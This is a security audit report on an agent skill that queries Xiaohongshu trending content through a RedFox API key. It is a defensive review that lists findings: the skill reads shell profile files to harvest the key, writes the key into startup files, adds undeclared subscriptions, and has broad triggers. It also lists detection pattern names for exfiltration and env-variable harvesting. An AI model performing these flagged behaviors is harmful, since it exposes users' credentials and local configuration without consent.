Back to skill

Security audit

小红书每日爆款笔记

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its stated purpose, but it handles API-key setup and local shell profile files in ways users should review before installing.

Install only if you are comfortable giving the skill a RedFox API key and letting it query RedFox/Xiaohongshu data. Prefer setting REDFOX_API_KEY only for the current session or through a proper secret store instead of asking the agent to write it into shell startup files. Be aware that generated HTML loads export libraries from public CDNs and that subscribing enables recurring daily output.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (16)

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
The workflow explicitly instructs the agent to help users persistently set the REDFOX_API_KEY in shell startup files or Windows user environment settings. This is dangerous because it drives the agent to modify long-lived system configuration and handle secrets in a way that can expose credentials to other processes, future sessions, shared accounts, or accidental disclosure in terminal history and logs.

Description-Behavior Mismatch

Medium
Confidence
88% confidence
Finding
The skill adds a subscription/push service capability beyond the core manifest-style description of querying and analyzing trending content. Expanding into autonomous recurring delivery changes the trust model: it enables ongoing actions and repeated outputs without a fresh user request, which increases the chance of unwanted notifications, data leakage in shared contexts, and abuse of the agent as a persistence channel.

Description-Behavior Mismatch

Medium
Confidence
84% confidence
Finding
The workflow introduces HTML/PDF export behavior not described in the skill metadata, expanding the skill from analysis into file generation and distribution. File export increases risk because generated artifacts can contain embedded links, unreviewed content, or sensitive data and may be shared outside the original interaction context.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The script falls back to reading shell startup files such as .zshrc and .bashrc to harvest REDFOX_API_KEY, which expands credential access beyond the process environment and surprises the user. Even though it targets one variable, reading personal shell config is broader secret access than necessary for a simple HTML generator and creates unnecessary exposure to local secrets and sensitive configuration.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The script reads the user's shell profile files to extract REDFOX_API_KEY without explicit consent at runtime. Accessing ~/.zshrc, ~/.bashrc, and similar files is broader than necessary for the stated purpose of fetching rankings and can expose sensitive local configuration patterns or secrets beyond the intended execution context.

Description-Behavior Mismatch

Medium
Confidence
84% confidence
Finding
The script supports writing fetched data to an arbitrary local path via --output_json, which expands the skill's behavior beyond simple querying/analysis into filesystem modification. While not overtly malicious, unexpected file writes can overwrite user files or persist data in locations the user did not anticipate, especially if this skill is invoked by an agent on the user's behalf.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The page loads executable JavaScript from public CDNs at runtime, creating a supply-chain trust dependency outside the skill package. If the CDN, dependency, or transit path is compromised, arbitrary script could run in the page context and tamper with displayed data, harvest visible content, or abuse any ambient privileges available to the hosting environment.

Vague Triggers

Medium
Confidence
91% confidence
Finding
The README instructs users to invoke the skill with unrestricted natural-language requests, which creates a broad activation surface and increases the chance the skill is triggered by ordinary conversation not clearly intended as a tool invocation. In agent environments, this can cause unintended data retrieval, external API usage, or subscription-related actions when ambiguous user text is interpreted as a command.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The example phrase is ordinary conversational language that could easily appear in unrelated user dialogue, making accidental invocation more likely. Because this skill performs external lookups and can lead into follow-on actions like loading more results or enabling daily pushes, broad trigger phrasing increases the risk of unintended tool execution and noisy or unauthorized actions.

Vague Triggers

Medium
Confidence
81% confidence
Finding
The trigger phrases are broad enough that ordinary user conversation such as asking about trending content or keywords could invoke the skill unintentionally. Because the skill can perform API calls and generate files, accidental invocation may cause unwanted external requests, data processing, or file creation outside the user's intent.

Vague Triggers

Medium
Confidence
84% confidence
Finding
The generic trend-query example is ambiguous and could match normal conversation about 'what is popular lately,' causing the skill to activate in contexts where the user did not intend a Xiaohongshu data lookup. In this skill context, that ambiguity is more dangerous because activation can lead to network access, use of API-backed data, and follow-on workflow steps like subscriptions or HTML generation.

Vague Triggers

Medium
Confidence
80% confidence
Finding
The trigger conditions are broad enough to match common conversational requests about trends or hot content, which can cause the skill to activate in situations the user did not intend. In this skill, that matters because activation can lead to external API access and downstream behaviors like analysis formatting or subscription prompting, increasing the chance of unintended data retrieval and user confusion.

Missing User Warnings

High
Confidence
97% confidence
Finding
The document tells the agent to proactively help set a permanent environment variable for an API key but does not adequately warn about the sensitivity of credentials or the risks of persistent system changes. This combination can push users into unsafe secret handling practices and normalized privilege/system modification by the agent, which is especially risky in shared machines or enterprise environments.

Missing User Warnings

Medium
Confidence
86% confidence
Finding
The subscription feature establishes ongoing automatic output at a scheduled time, but the workflow does not adequately surface the persistence of that behavior, its notification implications, or how users can control or revoke it. That is dangerous because users may not understand they are enabling recurring actions, and repeated push content can create privacy, nuisance, or abuse concerns if delivered in the wrong context.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
Reading shell rc/profile files without an upfront user-facing warning is a transparency and consent problem, especially in an agent skill context where users may not expect local file inspection. The behavior is hidden and could access credentials or other sensitive shell configuration unexpectedly.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The code silently inspects shell startup files for a credential, which is sensitive local data access not clearly disclosed to the user. In an agent skill context, this is more dangerous because users may expect a data-query tool, not a tool that reads private configuration files from their home directory.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal

Static analysis

Detected: suspicious.exposed_secret_literal

File appears to expose a hardcoded API secret or token.

Critical
Code
suspicious.exposed_secret_literal
Location
scripts/gen_xhs_html.py:194

File appears to expose a hardcoded API secret or token.

Critical
Code
suspicious.exposed_secret_literal
Location
scripts/xhs_daily_fetcher.py:173